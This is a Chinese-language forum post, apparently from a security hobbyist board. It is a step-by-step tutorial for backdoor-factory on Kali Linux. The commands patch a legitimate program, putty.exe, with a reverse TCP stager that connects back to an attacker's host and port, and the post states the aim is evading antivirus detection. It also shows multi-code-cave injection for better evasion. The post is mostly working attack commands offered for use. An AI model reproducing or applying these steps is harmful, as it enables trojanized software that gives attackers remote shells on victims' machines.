搜索
查看: 7477|回复: 0

backdoor-factory patch注入绕过

[复制链接]

330

主题

177

回帖

1071

积分

vip用户

积分
1071

注册会员活跃会员热心会员

QQ
发表于 2018-5-12 01:31:56 | 显示全部楼层 |阅读模式
backdoor-factory 看其名知其意,直译过来就是后门工厂的意思。利用其 patch 方式的编码加密技术,可以轻松的生成win32PE后门程序,从而帮助我们绕过一些防病毒软件的查杀,达到一定得免杀效果!下面,我们来看看如何在 kali 上使用它。
kali2.0 内已经集成了该款软件,如果找不到可以自己进行安装:
  1. apt-get install backdoor-factory
复制代码
检测软件是否能够植入木马
  1. backdoor-factory -f xx.exe -S
复制代码
三:在确定其支持patch 后,我们再来查看其是否支持我们指定的 shellcode patch
  1. backdoor-factory -f xx.exe -c -l 200
复制代码
-c:code cave(代码裂缝)

-l:代码裂缝大小
四:接下来我们继续检查 putty.exe 支持哪些 payload 的注入:
  1. backdoor-factory -f xx.exe -s show
复制代码
从检查结果可以看出其支持以下几种 payload 的注入:
接着我们就可以使用 -s 参数来进行选择 payload 并对其实现注入:
  1. backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.15.135 -P 4444
复制代码
-s:选择使用 payload 类型
-H:选择回连服务器地址
-P:回连服务器端口
当我们回车执行后,我们可以看到以下界面。这里要求我们选择 code cave ,我随便选择了一个 cave  3  回车。此时我们可以看到生成的文件,已被保存到了 backdoored 目录下!
以上 patch 方式为 单代码裂缝的注入,为了取得更好的免杀效果,我们还可以使用 多代码裂缝的方式进行注入!
backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.15.135 -P 4444 -J

-J:使用多代码裂缝注入


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
有没有参加CTF比赛的,一起组队啊!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表